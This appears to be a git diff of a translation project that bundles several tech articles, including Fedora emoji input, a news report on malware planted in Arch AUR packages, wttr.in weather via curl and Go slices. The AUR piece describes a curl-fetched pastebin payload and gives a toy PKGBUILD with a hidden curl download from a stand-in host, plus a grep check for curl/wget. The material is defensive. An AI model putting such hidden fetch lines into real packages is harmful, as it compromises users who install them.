Fedora 28 Workstation ships with a feature that allows you to quickly search, select, and input emoji using your keyboard. Emoji, cute ideograms that are part of Unicode, are used fairly widely in messaging and especially on mobile devices. You may have heard the idiom “A picture is worth a thousand words.” This is exactly what emoji provide: simple images for you to use in communication. Each release of Unicode adds more, with over 200 new ones added in recent releases. This article shows you how to make them easy to use on your Fedora system.

It’s great to see the number of emoji growing. But at the same time, it brings the challenge of how to input them on a computing device. Many people already use these symbols for input on mobile devices or social networking sites.

[**Editors’ note:** This article is an update to a previously published piece on this topic.]

### Enabling Emoji input on Fedora 28 Workstation

The new emoji input method ships by default in Fedora 28 Workstation. To use it, you must enable it using the Region and Language settings dialog. Open the Region and Language dialog from the main Fedora Workstation settings, or search for it in the Overview.

[![Region & Language settings tool][1]][2]

Choose the + control to add an input source. The following dialog appears:

[![Adding an input source][3]][4]

Choose the final option (three dots) to expand the selections fully. Then, find Other at the bottom of the list and select it:
[![Selecting other input sources][5]][6]

In the next dialog, find the Typing booster choice and select it:

[![][7]][8]

This advanced input method is powered behind the scenes by iBus. The advanced input methods are identifiable in the list by the cogs icon on the right of the list.

The Input Method drop-down automatically appears in the GNOME Shell top bar. Ensure your default method — in this example, English (US) — is selected as the current method, and you’ll be ready to input.

[![Input method dropdown in Shell top bar][9]][10]

### Using the new Emoji input method

Now that the Emoji input method is enabled, search for emoji by pressing the keyboard shortcut **Ctrl+Shift+E**. A pop-over dialog appears where you can type a search term, such as smile, to find matching symbols.

[![Searching for smile emoji][11]][12]

Use the arrow keys to navigate the list. Then, hit **Enter** to make your selection, and the glyph will be placed as input.
--------------------------------------------------------------------------------

via: https://fedoramagazine.org/boost-typing-emoji-fedora-28-workstation/

作者:[Paul W. Frields][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[译者ID](https://github.com/译者ID)
校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://fedoramagazine.org/author/pfrields/
[1]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-15-02-41-1024x718.png
[2]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-15-02-41.png
[3]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-33-46-1024x839.png
[4]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-33-46.png
[5]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-34-15-1024x839.png
[6]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-34-15.png
[7]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-34-41-1024x839.png
[8]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-34-41.png
[9]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-15-05-24-300x244.png
[10]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-15-05-24.png
[11]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-36-31-290x300.png
[12]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-36-31.png
@ -1,45 +0,0 @@
translating---geekpi

Malware Found On The Arch User Repository (AUR)
======

On July 7, an AUR package was modified with some malicious code, reminding [Arch Linux][1] users (and Linux users in general) that all user-generated packages should be checked (when possible) before installation.

[AUR][3], or the Arch (Linux) User Repository, contains package descriptions, also known as PKGBUILDs, which make compiling packages from source easier. While these packages are very useful, they should never be treated as safe, and users should always check their contents before using them, when possible. After all, the AUR webpage states in bold that "AUR packages are user produced content. Any use of the provided files is at your own risk."

The [discovery][4] of an AUR package containing malicious code proves this. [acroread][5] was modified on July 7 (it appears it was previously "orphaned", meaning it had no maintainer) by a user named "xeactor" to include a `curl` command that downloaded a script from a pastebin. The script then downloaded another script and installed a systemd unit to run that script periodically.

**It appears [two other][2] AUR packages were modified in the same way. All the offending packages were removed, and the user account (which was registered on the same day those packages were updated) that was used to upload them was suspended.**

The malicious code didn't do anything truly harmful - it only tried to upload some system information, like the machine ID, the output of `uname -a` (which includes the kernel version, architecture, etc.), CPU information, pacman information, and the output of `systemctl list-units` (which lists systemd units information) to pastebin.com. I'm saying "tried" because no system information was actually uploaded due to an error in the second script (the upload function is called "upload", but the script tried to call it using a different name, "uploader").

Also, the person adding these malicious scripts to AUR left their personal Pastebin API key in the script in cleartext, proving once again that they don't know exactly what they are doing.

The purpose of trying to upload this information to Pastebin is not clear, especially since much more sensitive data could have been uploaded, like GPG / SSH keys.

**Update:** Reddit user u/xanaxdroid_ [mentions][6] that the same user named "xeactor" also had some cryptocurrency mining packages posted, so he speculates that "xeactor" was probably planning on adding some hidden cryptocurrency mining software to AUR (this was also the case with some Ubuntu Snap packages [two months ago][7]). That's why "xeactor" was probably trying to obtain various system information. All the packages uploaded by this AUR user have been removed, so I cannot check this.

**Another update:**

What exactly should you check in user-generated packages such as those found in AUR? This varies, and I can't tell you exactly, but you can start by looking for anything that tries to download something using `curl`, `wget`, and other similar tools, and see what exactly it is attempting to download. Also check the server from which the package source is downloaded and make sure it's the official source. Unfortunately, this is not an exact 'science'. For Launchpad PPAs, for example, things get more complicated, as you must know how Debian packaging works, and the source can be altered directly, as it's hosted in the PPA and uploaded by the user. It gets even more complicated with Snap packages, because you cannot check such packages before installation (as far as I know). In these latter cases, and as a generic solution, I guess you should only install user-generated packages if you trust the uploader / packager.
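As a rough first pass, something as simple as grepping a PKGBUILD for network fetches can surface the kind of payload described above. A sketch — the PKGBUILD content and pastebin URL here are made up for the demonstration:

```shell
# Create a toy PKGBUILD that hides a curl payload, then scan it
# for commands that pull content from the network.
cat > PKGBUILD <<'EOF'
pkgname=acroread
pkgver=9.5.5
prepare() {
  curl -s https://example.com/XXXX -o x  # suspicious: fetches an opaque script
}
EOF

# Flag any line that downloads something; review each hit by hand.
grep -nE 'curl|wget' PKGBUILD
```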
--------------------------------------------------------------------------------

via: https://www.linuxuprising.com/2018/07/malware-found-on-arch-user-repository.html

作者:[Logix][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[译者ID](https://github.com/译者ID)
校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://plus.google.com/118280394805678839070
[1]:https://www.archlinux.org/
[2]:https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html
[3]:https://aur.archlinux.org/
[4]:https://lists.archlinux.org/pipermail/aur-general/2018-July/034152.html
[5]:https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&id=b3fec9f2f16703c2dae9e793f75ad6e0d98509bc
[6]:https://www.reddit.com/r/archlinux/comments/8x0p5z/reminder_to_always_read_your_pkgbuilds/e21iugg/
[7]:https://www.linuxuprising.com/2018/05/malware-found-in-ubuntu-snap-store.html
@ -1,74 +0,0 @@
15 open source applications for MacOS
======

![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/computer_keyboard_laptop_development_blue.png?itok=IfckxN48)

I use open source tools whenever and wherever I can. I returned to college a while ago to earn a master's degree in educational leadership. Even though I switched from my favorite Linux laptop to a MacBook Pro (since I wasn't sure Linux would be accepted on campus), I decided I would keep using my favorite tools, even on MacOS, as much as I could.

Fortunately, it was easy, and no professor ever questioned what software I used. Even so, I couldn't keep a secret.

I knew some of my classmates would eventually assume leadership positions in school districts, so I shared information about the open source applications described below with many of my MacOS- or Windows-using classmates. After all, open source software is really about freedom and goodwill. I also wanted them to know that it would be easy to provide their students with world-class applications at little cost. Most of them were surprised and amazed because, as we all know, open source software doesn't have a marketing team except users like you and me.

### My MacOS learning curve

Through this process, I learned some of the nuances of MacOS. While most of the open source tools worked as I was used to, others required different installation methods. Tools like [yum][1], [DNF][2], and [APT][3] do not exist in the MacOS world—and I really missed them.

Some MacOS applications required dependencies and installations that were more difficult than what I was accustomed to with Linux. Nonetheless, I persisted. In the process, I learned how I could keep the best software on my new platform. Even much of MacOS's core is [open source][4].

Also, my Linux background made it easy to get comfortable with the MacOS command line. I still use it to create and copy files, add users, and use other [utilities][5] like cat, tac, more, less, and tail.

### 15 great open source applications for MacOS
* The college required that I submit most of my work electronically in DOCX format, and I did that easily, first with [OpenOffice][6] and later using [LibreOffice][7] to produce my papers.

* When I needed to produce graphics for presentations, I used my favorite graphics applications, [GIMP][8] and [Inkscape][9].

* My favorite podcast creation tool is [Audacity][10]. It's much simpler to use than the proprietary application that ships with the Mac. I use it to record interviews and create soundtracks for video presentations.

* I discovered early on that I could use the [VideoLan][11] (VLC) media player on MacOS.

* MacOS's built-in proprietary video creation tool is a good product, but you can easily install and use [OpenShot][12], which is a great content creation tool.

* When I need to analyze networks for my clients, I use the easy-to-install [Nmap][13] (Network Mapper) and [Wireshark][14] tools on my Mac.

* I use [VirtualBox][15] for MacOS to demonstrate Raspbian, Fedora, Ubuntu, and other Linux distributions, as well as Moodle, WordPress, Drupal, and Koha when I provide training for librarians and other educators.

* I make boot drives on my MacBook using [Etcher.io][16]. I just download the ISO file and burn it onto a USB stick.

* I think [Firefox][17] is easier and more secure to use than the proprietary browser that comes with the MacBook Pro, and it allows me to synchronize my bookmarks across operating systems.

* When it comes to eBook readers, [Calibre][18] cannot be beaten. It is easy to download and install, and you can even configure it for a [classroom eBook server][19] with a few clicks.

* Recently I have been teaching Python to middle school students, and I have found it is easy to download and install Python 3 and the IDLE3 editor from [Python.org][20]. I have also enjoyed learning about data science and sharing that with students. Whether you're interested in Python or R, I recommend you download and [install][21] the [Anaconda distribution][22]. It contains the great iPython editor, RStudio, Jupyter Notebooks, and JupyterLab, along with some other applications.

* [HandBrake][23] is a great way to turn your old home video DVDs into MP4s, which you can share on YouTube, Vimeo, or your own [Kodi][24] server on MacOS.

Now it's your turn: What open source software are you using on MacOS (or Windows)? Share your favorites in the comments.
--------------------------------------------------------------------------------

via: https://opensource.com/article/18/7/open-source-tools-macos

作者:[Don Watkins][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[译者ID](https://github.com/译者ID)
校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://opensource.com/users/don-watkins
[1]:https://en.wikipedia.org/wiki/Yum_(software)
[2]:https://en.wikipedia.org/wiki/DNF_(software)
[3]:https://en.wikipedia.org/wiki/APT_(Debian)
[4]:https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/SystemTechnology/SystemTechnology.html
[5]:https://www.gnu.org/software/coreutils/coreutils.html
[6]:https://www.openoffice.org/
[7]:https://www.libreoffice.org/
[8]:https://www.gimp.org/
[9]:https://inkscape.org/en/
[10]:https://www.audacityteam.org/
[11]:https://www.videolan.org/index.html
[12]:https://www.openshot.org/
[13]:https://nmap.org/
[14]:https://www.wireshark.org/
[15]:https://www.virtualbox.org/
[16]:https://etcher.io/
[17]:https://www.mozilla.org/en-US/firefox/new/
[18]:https://calibre-ebook.com/
[19]:https://opensource.com/article/17/6/raspberrypi-ebook-server
[20]:https://www.python.org/downloads/release/python-370/
[21]:https://opensource.com/article/18/4/getting-started-anaconda-python
[22]:https://www.anaconda.com/download/#macos
[23]:https://handbrake.fr/
[24]:https://kodi.tv/download
@ -1,92 +0,0 @@
6 open source cryptocurrency wallets
======

![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/bus_cash_register.jpg?itok=7NKVKuPa)

Without crypto wallets, cryptocurrencies like Bitcoin and Ethereum would just be another pie-in-the-sky idea. These wallets are essential for keeping, sending, and receiving cryptocurrencies.

The revolutionary growth of [cryptocurrencies][1] is attributed to the idea of decentralization, where a central authority is absent from the network and everyone has a level playing field. Open source technology is at the heart of cryptocurrencies and [blockchain][2] networks. It has enabled the vibrant, nascent industry to reap the benefits of decentralization—such as immutability, transparency, and security.

If you're looking for a free and open source cryptocurrency wallet, read on to start exploring whether any of the following options meet your needs.

### 1. Copay

[Copay][3] is an open source Bitcoin crypto wallet that promises convenient storage. The software is released under the [MIT License][4].

The Copay server is also open source. Therefore, developers and Bitcoin enthusiasts can assume complete control of their activities by deploying their own applications on the server.

The Copay wallet empowers you to take the security of your Bitcoin into your own hands, instead of trusting unreliable third parties. It allows you to use multiple signatories for approving transactions and supports the storage of multiple, separate wallets within the same app.

Copay is available for a range of platforms, such as Android, Windows, MacOS, Linux, and iOS.
|
|
||||||
|
|
||||||
### 2\. MyEtherWallet
|
|
||||||
|
|
||||||
As the name implies, [MyEtherWallet][5] (abbreviated MEW) is a wallet for Ethereum transactions. It is open source (under the [MIT License][6]) and is completely online, accessible through a web browser.
|
|
||||||
|
|
||||||
The wallet has a simple client-side interface, which allows you to participate in the Ethereum blockchain confidently and securely.
|
|
||||||
|
|
||||||
### 3\. mSIGNA
|
|
||||||
|
|
||||||
[mSIGNA][7] is a powerful desktop application for completing transactions on the Bitcoin network. It is released under the [MIT License][8] and is available for MacOS, Windows, and Linux.
|
|
||||||
|
|
||||||
The blockchain wallet provides you with complete control over your Bitcoin stash. Some of its features include user-friendliness, versatility, decentralized offline key generation capabilities, encrypted data backups, and multi-device synchronization.
|
|
||||||
|
|
||||||
### 4\. Armory
|
|
||||||
|
|
||||||
[Armory][9] is an open source wallet (released under the [GNU AGPLv3][10]) for producing and keeping Bitcoin private keys on your computer. It enhances security by providing users with cold storage and multi-signature support capabilities.
|
|
||||||
|
|
||||||
With Armory, you can set up a wallet on a computer that is completely offline; you'll use the watch-only feature for observing your Bitcoin details on the internet, which improves security. The wallet also allows you to create multiple addresses and use them to complete different transactions.
|
|
||||||
|
|
||||||
Armory is available for MacOS, Windows, and several flavors of Linux (including Raspberry Pi).
|
|
||||||
|
|
||||||
### 5\. Electrum
|
|
||||||
|
|
||||||
[Electrum][11] is a Bitcoin wallet that navigates the thin line between beginner user-friendliness and expert functionality. The open source wallet is released under the [MIT License][12].
|
|
||||||
|
|
||||||
Electrum encrypts your private keys locally, supports cold storage, and provides multi-signature capabilities with minimal resource usage on your machine.
|
|
||||||
|
|
||||||
It is available for a wide range of operating systems and devices, including Windows, MacOS, Android, iOS, and Linux, and hardware wallets such as [Trezor][13].
|
|
||||||
|
|
||||||
### 6\. Etherwall
|
|
||||||
|
|
||||||
[Etherwall][14] is the first wallet for storing and sending Ethereum on the desktop. The open source wallet is released under the [GPLv3 License][15].
|
|
||||||
|
|
||||||
Etherwall is intuitive and fast. What's more, to enhance the security of your private keys, you can operate it on a full node or a thin node. Running it as a full-node client will enable you to download the whole Ethereum blockchain on your local machine.
|
|
||||||
|
|
||||||
Etherwall is available for MacOS, Linux, and Windows, and it also supports the Trezor hardware wallet.
|
|
||||||
|
|
||||||
### Words to the wise
|
|
||||||
|
|
||||||
Open source and free crypto wallets are playing a vital role in making cryptocurrencies easily available to more people.
|
|
||||||
|
|
||||||
Before using any digital currency software wallet, make sure to do your due diligence to protect your security, and always remember to comply with best practices for safeguarding your finances.
|
|
||||||
|
|
||||||
If your favorite open source cryptocurrency wallet is not on this list, please share what you know in the comment section below.
|
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
|
||||||
|
|
||||||
via: https://opensource.com/article/18/7/crypto-wallets
|
|
||||||
|
|
||||||
作者:[Dr.Michael J.Garbade][a]
|
|
||||||
选题:[lujun9972](https://github.com/lujun9972)
|
|
||||||
译者:[译者ID](https://github.com/译者ID)
|
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
|
||||||
|
|
||||||
[a]:https://opensource.com/users/drmjg
|
|
||||||
[1]:https://www.liveedu.tv/guides/cryptocurrency/
|
|
||||||
[2]:https://opensource.com/tags/blockchain
|
|
||||||
[3]:https://copay.io/
|
|
||||||
[4]:https://github.com/bitpay/copay/blob/master/LICENSE
|
|
||||||
[5]:https://www.myetherwallet.com/
|
|
||||||
[6]:https://github.com/kvhnuke/etherwallet/blob/mercury/LICENSE.md
|
|
||||||
[7]:https://ciphrex.com/
|
|
||||||
[8]:https://github.com/ciphrex/mSIGNA/blob/master/LICENSE
|
|
||||||
[9]:https://www.bitcoinarmory.com/
|
|
||||||
[10]:https://github.com/etotheipi/BitcoinArmory/blob/master/LICENSE
|
|
||||||
[11]:https://electrum.org/#home
|
|
||||||
[12]:https://github.com/spesmilo/electrum/blob/master/LICENCE
|
|
||||||
[13]:https://trezor.io/
|
|
||||||
[14]:https://www.etherwall.com/
|
|
||||||
[15]:https://github.com/almindor/etherwall/blob/master/LICENSE
|
|
@ -1,117 +0,0 @@
|
|||||||
Display Weather Forecast In Your Terminal With Wttr.in
|
|
||||||
======
|
|
||||||
**[wttr.in][1] is a feature-packed weather forecast service that supports displaying the weather from the command line**. It can automatically detect your location (based on your IP address), supports specifying the location or searching for a geographical location (like a site in a city, a mountain and so on), and much more. Oh, and **you don't have to install it - all you need to use it is cURL or Wget** (see below).
|
|
||||||
|
|
||||||
wttr.in features include:
|
|
||||||
|
|
||||||
* **displays the current weather as well as a 3-day weather forecast, split into morning, noon, evening and night** (includes temperature range, wind speed and direction, viewing distance, precipitation amount and probability)
|
|
||||||
|
|
||||||
* **can display Moon phases**
|
|
||||||
|
|
||||||
* **automatic location detection based on your IP address**
|
|
||||||
|
|
||||||
* **allows specifying a location using the city name, 3-letter airport code, area code, GPS coordinates, IP address, or domain name**. You can also specify a geographical location like a lake, mountain, landmark, and so on
|
|
||||||
|
|
||||||
* **supports multilingual location names** (the query string must be specified in Unicode)
|
|
||||||
|
|
||||||
* **supports specifying the language** in which the weather forecast should be displayed (it supports more than 50 languages)
|
|
||||||
|
|
||||||
* **it uses USCS units for queries from the USA and the metric system for the rest of the world**, but you can change this by appending `?u` for USCS, and `?m` for the metric system (SI)
|
|
||||||
|
|
||||||
* **3 output formats: ANSI for the terminal, HTML for the browser, and PNG**.
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
Like I mentioned in the beginning of the article, to use wttr.in, all you need is cURL or Wget, but you can also install it on your own server if you prefer (see the project's [installation instructions][3]).
|
|
||||||
|
|
||||||
**Before using wttr.in, make sure cURL is installed.** In Debian, Ubuntu or Linux Mint (and other Debian or Ubuntu-based Linux distributions), install cURL using this command:
|
|
||||||
```
|
|
||||||
sudo apt install curl
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
### wttr.in command line examples
|
|
||||||
|
|
||||||
Get the weather for your location (wttr.in tries to guess your location based on your IP address):
|
|
||||||
```
|
|
||||||
curl wttr.in
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
Force cURL to resolve names to IPv4 addresses (in case you're having issues with IPv6 and wttr.in) by adding `-4` after `curl` :
|
|
||||||
```
|
|
||||||
curl -4 wttr.in
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
**Wget also works** (instead of cURL) if you want to retrieve the current weather and forecast as a PNG, or if you use it like this:
|
|
||||||
```
|
|
||||||
wget -O- -q wttr.in
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
You can replace `curl` with `wget -O- -q` in all the commands below if you prefer Wget over cURL.
|
|
||||||
|
|
||||||
Specify the location:
|
|
||||||
```
|
|
||||||
curl wttr.in/Dublin
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
Display weather information for a landmark (the Eiffel Tower in this example):
|
|
||||||
```
|
|
||||||
curl wttr.in/~Eiffel+Tower
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
Get the weather information for an IP address' location (the IP below belongs to GitHub):
|
|
||||||
```
|
|
||||||
curl wttr.in/@192.30.253.113
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
Retrieve the weather using USCS units:
|
|
||||||
```
|
|
||||||
curl wttr.in/Paris?u
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
Force wttr.in to use the metric system (SI) if you're in the USA:
|
|
||||||
```
|
|
||||||
curl wttr.in/New+York?m
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
Use Wget to download the current weather and 3-day forecast as a PNG image:
|
|
||||||
```
|
|
||||||
wget wttr.in/Istanbul.png
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
You can specify additional PNG options, such as transparency, as part of the file name; see the project's [supported formats][5] documentation for details.
|
|
||||||
|
|
||||||
**For many other examples, check out the wttr.in[project page][2] or type this in a terminal:**
|
|
||||||
```
|
|
||||||
curl wttr.in/:help
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
|
||||||
|
|
||||||
via: https://www.linuxuprising.com/2018/07/display-weather-forecast-in-your.html
|
|
||||||
|
|
||||||
作者:[Logix][a]
|
|
||||||
选题:[lujun9972](https://github.com/lujun9972)
|
|
||||||
译者:[译者ID](https://github.com/译者ID)
|
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
|
||||||
|
|
||||||
[a]:https://plus.google.com/118280394805678839070
|
|
||||||
[1]:https://wttr.in/
|
|
||||||
[2]:https://github.com/chubin/wttr.in
|
|
||||||
[3]:https://github.com/chubin/wttr.in#installation
|
|
||||||
[4]:https://github.com/schachmat/wego
|
|
||||||
[5]:https://github.com/chubin/wttr.in#supported-formats
|
|
@ -1,65 +0,0 @@
|
|||||||
translating---geekpi
|
|
||||||
|
|
||||||
4 add-ons to improve your privacy on Thunderbird
|
|
||||||
======
|
|
||||||
|
|
||||||
![](https://fedoramagazine.org/wp-content/uploads/2017/08/tb-privacy-addons-816x345.jpg)
|
|
||||||
Thunderbird is a popular free email client developed by [Mozilla][1]. Similar to Firefox, Thunderbird offers a large choice of add-ons for extra features and customization. This article focuses on four add-ons to improve your privacy.
|
|
||||||
|
|
||||||
### Enigmail
|
|
||||||
|
|
||||||
Encrypting emails using GPG (GNU Privacy Guard) is the best way to keep their contents private. If you aren’t familiar with GPG, [check out our primer right here][2] on the Magazine.
|
|
||||||
|
|
||||||
[Enigmail][3] is the go-to add-on for using OpenPGP with Thunderbird. Indeed, Enigmail integrates well with Thunderbird, and lets you encrypt, decrypt, and digitally sign and verify emails.
|
|
||||||
|
|
||||||
### Paranoia
|
|
||||||
|
|
||||||
[Paranoia][4] gives you access to critical information about your incoming emails. An emoticon shows the encryption state of the connections between the servers an email traveled through before reaching your inbox.
|
|
||||||
|
|
||||||
A yellow, happy emoticon tells you all connections were encrypted. A blue, sad emoticon means one connection was not encrypted. Finally, a red, scared emoticon means the message wasn’t encrypted on more than one connection.
|
|
||||||
|
|
||||||
More details about these connections are available, so you can check which servers were used to deliver the email.
|
|
||||||
|
|
||||||
### Sensitivity Header
|
|
||||||
|
|
||||||
[Sensitivity Header][5] is a simple add-on that lets you select the privacy level of an outgoing email. Using the option menu, you can select a sensitivity: Normal, Personal, Private and Confidential.
|
|
||||||
|
|
||||||
Adding this header doesn’t add extra security to email. However, some email clients or mail transport/user agents (MTA/MUA) can use this header to process the message differently based on the sensitivity.
|
|
||||||
|
|
||||||
Note that this add-on is marked as experimental by its developers.
|
|
||||||
|
|
||||||
### TorBirdy
|
|
||||||
|
|
||||||
If you’re really concerned about your privacy, [TorBirdy][6] is the add-on for you. It configures Thunderbird to use the [Tor][7] network.
|
|
||||||
|
|
||||||
TorBirdy offers less privacy on email accounts that have been used without Tor before, as noted in the [documentation][8].
|
|
||||||
|
|
||||||
> Please bear in mind that email accounts that have been used without Tor before offer **less** privacy/anonymity/weaker pseudonyms than email accounts that have always been accessed with Tor. But nevertheless, TorBirdy is still useful for existing accounts or real-name email addresses. For example, if you are looking for location anonymity — you travel a lot and don’t want to disclose all your locations by sending emails — TorBirdy works wonderfully!
|
|
||||||
|
|
||||||
Note that to use this add-on, you must have Tor installed on your system.
|
|
||||||
|
|
||||||
Photo by [Braydon Anderson][9] on [Unsplash][10].
|
|
||||||
|
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
|
||||||
|
|
||||||
via: https://fedoramagazine.org/4-addons-privacy-thunderbird/
|
|
||||||
|
|
||||||
作者:[Clément Verna][a]
|
|
||||||
选题:[lujun9972](https://github.com/lujun9972)
|
|
||||||
译者:[译者ID](https://github.com/译者ID)
|
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
|
||||||
|
|
||||||
[a]:https://fedoramagazine.org
|
|
||||||
[1]:https://www.mozilla.org/en-US/
|
|
||||||
[2]:https://fedoramagazine.org/gnupg-a-fedora-primer/
|
|
||||||
[3]:https://addons.mozilla.org/en-US/thunderbird/addon/enigmail/
|
|
||||||
[4]:https://addons.mozilla.org/en-US/thunderbird/addon/paranoia/?src=cb-dl-users
|
|
||||||
[5]:https://addons.mozilla.org/en-US/thunderbird/addon/sensitivity-header/?src=cb-dl-users
|
|
||||||
[6]:https://addons.mozilla.org/en-US/thunderbird/addon/torbirdy/?src=cb-dl-users
|
|
||||||
[7]:https://www.torproject.org/
|
|
||||||
[8]:https://trac.torproject.org/projects/tor/wiki/torbirdy
|
|
||||||
[9]:https://unsplash.com/photos/wOHH-NUTvVc?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText
|
|
||||||
[10]:https://unsplash.com/search/photos/privacy?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText
|
|
@ -1,3 +1,4 @@
|
|||||||
|
Translating by qhwdw
|
||||||
A sysadmin's guide to SELinux: 42 answers to the big questions
|
A sysadmin's guide to SELinux: 42 answers to the big questions
|
||||||
======
|
======
|
||||||
|
|
||||||
|
263
sources/tech/20180712 Slices from the ground up.md
Normal file
263
sources/tech/20180712 Slices from the ground up.md
Normal file
@ -0,0 +1,263 @@
|
|||||||
|
name1e5s is translating
|
||||||
|
|
||||||
|
|
||||||
|
Slices from the ground up
|
||||||
|
============================================================
|
||||||
|
|
||||||
|
This blog post was inspired by a conversation with a co-worker about using a slice as a stack. The conversation turned into a wider discussion on the way slices work in Go, so I thought it would be useful to write it up.
|
||||||
|
|
||||||
|
### Arrays
|
||||||
|
|
||||||
|
Every discussion of Go’s slice type starts by talking about something that isn’t a slice, namely, Go’s array type. Arrays in Go have two relevant properties:
|
||||||
|
|
||||||
|
1. They have a fixed size; `[5]int` is an array of five `int`s, and is distinct from `[3]int`.
|
||||||
|
|
||||||
|
2. They are value types. Consider this example:
|
||||||
|
```
|
||||||
|
package main
|
||||||
|
|
||||||
|
import "fmt"
|
||||||
|
|
||||||
|
func main() {
|
||||||
|
var a [5]int
|
||||||
|
b := a
|
||||||
|
b[2] = 7
|
||||||
|
fmt.Println(a, b) // prints [0 0 0 0 0] [0 0 7 0 0]
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
The statement `b := a` declares a new variable, `b`, of type `[5]int`, and _copies_ the contents of `a` to `b`. Updating `b` has no effect on the contents of `a` because `a` and `b` are independent values.[1][1]
|
||||||
|
|
||||||
|
### Slices
|
||||||
|
|
||||||
|
Go’s slice type differs from its array counterpart in two important ways:
|
||||||
|
|
||||||
|
1. Slices do not have a fixed length. A slice’s length is not declared as part of its type, rather it is held within the slice itself and is recoverable with the built-in function `len`.[2][2]
|
||||||
|
|
||||||
|
2. Assigning one slice variable to another _does not_ make a copy of the slice's contents. This is because a slice does not directly hold its contents. Instead a slice holds a pointer to its _underlying_ array[3][3] which holds the contents of the slice.
|
||||||
|
|
||||||
|
As a result of the second property, two slices can share the same underlying array. Consider these examples:
|
||||||
|
|
||||||
|
1. Slicing a slice:
|
||||||
|
```
|
||||||
|
package main
|
||||||
|
|
||||||
|
import "fmt"
|
||||||
|
|
||||||
|
func main() {
|
||||||
|
var a = []int{1,2,3,4,5}
|
||||||
|
b := a[2:]
|
||||||
|
b[0] = 0
|
||||||
|
fmt.Println(a, b) // prints [1 2 0 4 5] [0 4 5]
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
In this example `a` and `b` share the same underlying array–even though `b` starts at a different offset in that array, and has a different length. Changes to the underlying array via `b` are thus visible to `a`.
|
||||||
|
|
||||||
|
2. Passing a slice to a function:
|
||||||
|
```
|
||||||
|
package main
|
||||||
|
|
||||||
|
import "fmt"
|
||||||
|
|
||||||
|
func negate(s []int) {
|
||||||
|
for i := range s {
|
||||||
|
s[i] = -s[i]
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func main() {
|
||||||
|
var a = []int{1, 2, 3, 4, 5}
|
||||||
|
negate(a)
|
||||||
|
fmt.Println(a) // prints [-1 -2 -3 -4 -5]
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
In this example `a` is passed to `negate` as the formal parameter `s`. `negate` iterates over the elements of `s`, negating their sign. Even though `negate` does not return a value, or have any way to access the declaration of `a` in `main`, the contents of `a` are modified when passed to `negate`.
|
||||||
|
|
||||||
|
Most programmers have an intuitive understanding of how a Go slice’s underlying array works because it matches how array-like concepts in other languages tend to work. For example, here’s the first example of this section rewritten in Python:
|
||||||
|
|
||||||
|
```
|
||||||
|
Python 2.7.10 (default, Feb 7 2017, 00:08:15)
|
||||||
|
[GCC 4.2.1 Compatible Apple LLVM 8.0.0 (clang-800.0.34)] on darwin
|
||||||
|
Type "help", "copyright", "credits" or "license" for more information.
|
||||||
|
